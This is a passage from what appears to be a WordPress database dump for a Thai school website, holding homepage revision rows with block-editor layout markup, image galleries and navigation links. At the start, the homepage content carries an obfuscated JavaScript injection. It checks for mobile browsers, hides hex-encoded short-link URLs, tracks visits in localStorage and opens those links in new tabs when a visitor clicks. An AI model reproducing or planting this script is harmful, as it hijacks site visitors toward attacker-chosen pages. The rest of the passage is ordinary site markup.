u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-02 10:55:06','2025-07-02 03:55:06','',14,'http://pakhaeng.ssk.in.th/?p=1607',0,'revision','',0),
(1608,1,'2025-07-02 10:57:36','2025-07-02 03:57:36','','comment','','inherit','','closed','','comment','','','2025-07-02 10:57:36','2025-07-02 03:57:36','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png',0,'attachment','image/png',0),
(1609,1,'2025-07-02 10:57:39','2025-07-02 03:57:39','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 